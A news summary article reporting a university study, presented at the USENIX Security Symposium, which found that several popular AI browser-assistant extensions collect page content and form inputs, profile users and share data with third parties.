AI Web Browser Assistants Raise Serious Privacy Concerns, Study Reveals

Reviewed byNidhi Govil

2 Sources

Share

A new study uncovers widespread privacy issues with AI-powered web browser assistants, revealing that they collect and share sensitive user data without adequate safeguards.

AI Browser Assistants: A Privacy Nightmare

A groundbreaking study led by researchers from University College London (UCL) and Mediterranea University of Reggio Calabria has uncovered alarming privacy issues associated with popular AI-powered web browser assistants. The research, presented at the USENIX Security Symposium, reveals that these tools are collecting and sharing sensitive user data without adequate safeguards

1

.

Widespread Data Collection and Sharing

Source: Tech Xplore

Source: Tech Xplore

The study analyzed nine of the most popular generative AI browser extensions, including ChatGPT for Google, Merlin, and Copilot. These assistants, designed to enhance web browsing with AI-powered features, were found to engage in extensive data collection from users' web activity

1

.

Several assistants were discovered to transmit full webpage content to their servers, including any information visible on screen. Merlin, in particular, was found to capture form inputs such as online banking details and health data

1

.

User Profiling and Personalization

The research revealed that some assistants, including ChatGPT for Google, Copilot, Monica, and Sider, demonstrated the ability to infer user attributes such as age, gender, income, and interests. This information was then used to personalize responses across different browsing sessions

1

.

Third-Party Data Sharing

Extensions like Sider and TinaMind were found to share user questions and identifying information, such as IP addresses, with platforms like Google Analytics. This practice enables potential cross-site tracking and ad targeting

2

.

Violation of Privacy Laws

The study highlighted that some assistants potentially violate US data protection laws such as HIPAA and FERPA by collecting protected health and educational information. While the study focused on US regulations, the authors suggest that these practices would likely violate more stringent UK and EU data laws as well

1

.

Methodology and Findings

Researchers simulated real-world browsing scenarios using a persona of a "rich, millennial male from California." They conducted tests in both public (logged out) and private (logged in) spaces, including activities such as online shopping, accessing health portals, and using dating services

1

.

The experiments revealed that some assistants, including Merlin and Sider, did not cease recording activity when users switched to private browsing modes

1

.

Implications and Recommendations

Dr. Anna Maria Mandalari, senior author of the study, emphasized the unprecedented access these AI browser assistants have to users' online behavior in areas that should remain private. She warned about the potential consequences of such data collection, including the risk of data breaches

1

.

The authors recommend that developers adopt privacy-by-design principles, such as local processing or explicit user consent for data collection. They also call for greater regulatory oversight to protect users' personal data

1

.

A Call for Transparency and User Control

As generative AI becomes more integrated into our digital lives, the study underscores the urgent need for balance between convenience and privacy. Dr. Aurelio Canino, an author of the study, stressed the importance of ensuring that privacy is not sacrificed for convenience in this rapidly evolving technological landscape

1

.

TheOutpost.ai

Your Daily Dose of Curated AI News

Don’t drown in AI news. We cut through the noise - filtering, ranking and summarizing the most important AI news, breakthroughs and research daily. Spend less time searching for the latest in AI and get straight to action.

© 2025 Triveous Technologies Private Limited
Instagram logo
LinkedIn logo